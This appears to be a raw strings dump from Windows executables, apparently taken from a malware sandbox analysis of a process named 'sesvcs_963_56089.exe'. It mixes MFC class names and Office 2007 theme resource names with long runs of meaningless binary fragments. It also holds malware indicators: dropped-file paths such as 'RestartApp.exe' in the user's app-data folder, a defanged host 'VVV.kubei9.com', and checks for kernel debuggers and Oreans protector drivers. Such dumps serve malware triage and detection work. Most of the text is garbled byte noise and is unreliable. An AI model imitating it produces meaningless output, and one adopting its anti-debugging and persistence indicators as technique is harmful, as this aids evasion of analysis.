Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
C:\txservices.exe
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
T%Program Files%\NamuADLook.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0

sesvcs_963_56089.exe_2324:

.rsrc
.idata
%%XLH
"Gm.hR
We.oCvq
-7O%d
.IypG
ei-V}
]R.bf
.oc<?r
.FRKROw?
5.BK|
b6ffD%u
*_|.AW\
%F|tS Mr
6O%Cx
.SCxb8
qs*.Jh
,%xr:
.SY#!
O,%upz
}Z%umz\
.Kb\3
%.Ri5
lC%F\]&
"WP%S
m|.LU!
:.WsTX
L $%X7COO
.lCRM
%u)#<
.Ow yG
Tdh%Ck
.MZNt
~%Sr3
.gX?Zvf
q&Ð
6).xQ
|.CrX
2þ#
=.wJz
b %sZ~?
KTcPx8
25.nl-V
C.Lr^X#2
[}.ok
\$.ii
cMd&o
e~:Http
\u.FA[\Q
u=F.HM
%6X1w
)]i.lb
P_G%x
!-t}E
V%C}#
%xTPW
T.bw..
p.uG#
?/HD.ieg
i.AS_}
yi.Qyr
HM.ME
xr.in
I.iOn
Ga.Ap
L%T.Vl$
=F.Hg
vU3#.RB
%cU]Q
s=%XF
C8.KM6
z.PO}S
DWi.nLy
[q .mr
.wTv7
Y.jat
.AiX[.
;t.cY,
{ .CM
.FE% 
.av!?
.AXyj
-.fYr
8Y.Vq
.Op9r
K/.zHz
kernel32.dll
comctl32.dll
C:\Windows\system32\ntdll.dll
%userappdata%\RestartApp.exe
34$14$34$
4$\3,$1,$3,$
Exit Status = %d
3,$1,$3,$
]34$14$34$
3<$1<$3<$
_34$14$34$\
.gh2%
7?.bp
3<$1<$3<$\
USER32.dll
ADVAPI32.dll
NTDLL.dll
34$14$34$\
\\.\SICE
\\.\SIWVID
\\.\NTICE
3Cannot write oreans.vxd
\Oreans.vxd
ADVAPI32.DLL
oreans32.sys
oreansx64.sys
\\.\oreans32
\\.\Global\oreans32
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
3Cannot open oreans.vxd driver. Make sure that oreans.vxd
\\.\Oreans.vxd
%s\Oreans.vxd
contact info@oreans.com for this error
winmm.dll
\34$14$34$
CheckIN = %d
CheckOUT = %d
ProcIN = %d
ProcOUT = %d
ExitIN = %d
ExitOUT = %d
TPin = %d
HWIn = %d
IntV = %x, %x, %x, %x
3,$1,$3,$\
.hg>N
L>.Zk
.aitR
3An internal exception occurred (Address: 0x%x)
Please, contact yoursite@yoursite.com. Thank you!
[.FlFz
$\34$14$34$
yProcess Monitor - test.pml
1<$3<$1<$
<9.EXEu
Rd[)Ò
Rdl)Ò
.gRrH
%%uHs
!.tI*
]P5A
D.IeD.
?.cs?
?.tn?.
.: .`#7.
$/.`#/.!=
/`# .`#7.
j.NZ ..
.ii1.
$ .Gs
.Btj.=F
3?.`# .`#7.
_# .`#7.
U@.wd>=
].XWJ~p
N.MQ5
6.Aj6\A
I.NZK
6jD?MfN.JUG
ULS3.Fs3
A%UBE<P
WEBPP
D.PiE~V#BSP;E
BqW%C
ER0QFQ3%F^3
3.Gc9kA 5
HoL.HWNJK
BoV.BWPJE
P^i_.th
s%dsh@:/i
.tH7C
*aC=.qq
O.Hac\
p.xli
p.xliv
&).Bg
p.Tml
,--D}
.conf
%userap
ZO.De
X*%cH
t@r%C
s %D`N1
9dÛ,
w4iQ.IL
%f$oJ
.cw1J"
[u%u:
[)r.dP
>2Z%F
>Jrr[Ev.TKWa
%s7/Yj
.SO)O3
C.Di}
%Und)
:%Dz]W
<~.RU
?)%sr
ê%F%% 
.xC$H
Y&.mivO
R7.OI
blwtVRY=%X_
{%U";1
%S3%D
&Z%ul|
V/%f=
ýJ5
>]ET%u
_|.RUY3
tT9%U
.IUgx
=.qfj)
.tcTp
|%FMO
%X/B^(
mF.xxC
%F:%3
%F/%!
%sc%3PW
?"püN
y.KJ`
8F%X\8
7?.bp{6
\ .NR
8G_
5.nbM8)
qA8QcX.DP
%0xqq
-R6}7~
Gt.kJ
Ed.Bpb
p7=&
gCmDuA
tTg.wD
>.XA&
82%d@
0o{%C
q.%xe
y.XLp(
]PnA
:.AB,
^`.hVz
GBlbtCP
].XWJ
.pNpGp
/^)-P}
G#%CwD
3.Gc9
`.XCO
x_.tS
(V.pH{
gex%Dz(
?:.gz[
.TmKle
A.rV1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
AQUA_IDB_OFFICE2007_MENU_BTN%AQUA_IDB_OFFICE2007_MENU_BTN_DISABLED%AQUA_IDB_OFFICE2007_MENU_BTN_SCROLL_T"AQUA_IDB_OFFICE2007_MENU_ITEM_BACK&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_C&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_R$AQUA_IDB_OFFICE2007_POPUPMENU_BORDER'AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(AQUA_IDB_OFFICE2007_RIBBON_BORDER_FLOATY$AQUA_IDB_OFFICE2007_RIBBON_BTN_CHECK&AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_S*AQUA_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#AQUA_IDB_OFFICE2007_RIBBON_BTN_MAIN'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)AQUA_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*AQUA_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&AQUA_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_T*AQUA_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'AQUA_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"AQUA_IDB_OFFICE2007_STATUSBAR_BACK&AQUA_IDB_OFFICE2007_STATUSBAR_BACK_EXT(AQUA_IDB_OFFICE2007_STATUSBAR_PANEBORDER%AQUA_IDB_OFFICE2007_STATUSBAR_SIZEBOX AQUA_IDB_OFFICE2007_SYS_BTN_BACK"AQUA_IDB_OFFICE2007_SYS_BTN_BACK_S!AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE#AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE%AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLACK_IDB_OFFICE2007_MENU_BTN&BLACK_IDB_OFFICE2007_MENU_BTN_DISABLED&BLACK_IDB_OFFICE2007_MENU_BTN_SCROLL_T,BLACK_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR#BLACK_IDB_OFFICE2007_MENU_ITEM_BACK'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_C'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_R%BLACK_IDB_OFFICE2007_OUTLOOK_BAR_BACK%BLACK_IDB_OFFICE2007_OUTLOOK_BTN_PAGE%BLACK_IDB_OFFICE2007_POPUPMENU_BORDER(BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR0BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV1BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT/BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V)BLACK_IDB_OFFICE2007_RIBBON_BORDER_FLOATY&BLACK_IDB_OFFICE2007_RIBBON_BORDER_QAT%BLACK_IDB_OFFICE2007_RIBBON_BTN_CHECK'BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT0BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_F'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_L'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON$BLACK_IDB_OFFICE2007_RIBBON_BTN_MAIN(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_L&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_R)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T*BLACK_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN BLACK_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE&BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA,BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS)BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_BACK(BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB,BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB-BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB'BLACK_IDB_OFFICE2007_RIBBON_KEYTIP_BACK(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_B(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_T&BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN-BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER%BLACK_IDB_OFFICE2007_RIBBON_PANEL_QAT BLACK_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR)BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_BACK-BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL/BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT,BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS(BLACK_IDB_OFFICE2007_RIBBON_SLIDER_THUMB#BLACK_IDB_OFFICE2007_STATUSBAR_BACK'BLACK_IDB_OFFICE2007_STATUSBAR_BACK_EXT)BLACK_IDB_OFFICE2007_STATUSBAR_PANEBORDER&BLACK_IDB_OFFICE2007_STATUSBAR_SIZEBOX!BLACK_IDB_OFFICE2007_SYS_BTN_BACK#BLACK_IDB_OFFICE2007_SYS_BTN_BACK_S"BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE$BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S$BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE&BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLUE_IDB_OFFICE2007_MENU_BTN%BLUE_IDB_OFFICE2007_MENU_BTN_DISABLED%BLUE_IDB_OFFICE2007_MENU_BTN_SCROLL_T BLUE_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR"BLUE_IDB_OFFICE2007_MENU_ITEM_BACK&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_C&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_R$BLUE_IDB_OFFICE2007_OUTLOOK_BAR_BACK$BLUE_IDB_OFFICE2007_OUTLOOK_BTN_PAGE$BLUE_IDB_OFFICE2007_POPUPMENU_BORDER'BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(BLUE_IDB_OFFICE2007_RIBBON_BORDER_FLOATY%BLUE_IDB_OFFICE2007_RIBBON_BORDER_QAT$BLUE_IDB_OFFICE2007_RIBBON_BTN_CHECK&BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH*BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#BLUE_IDB_OFFICE2007_RIBBON_BTN_MAIN'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)BLUE_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*BLUE_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2BLUE_IDB_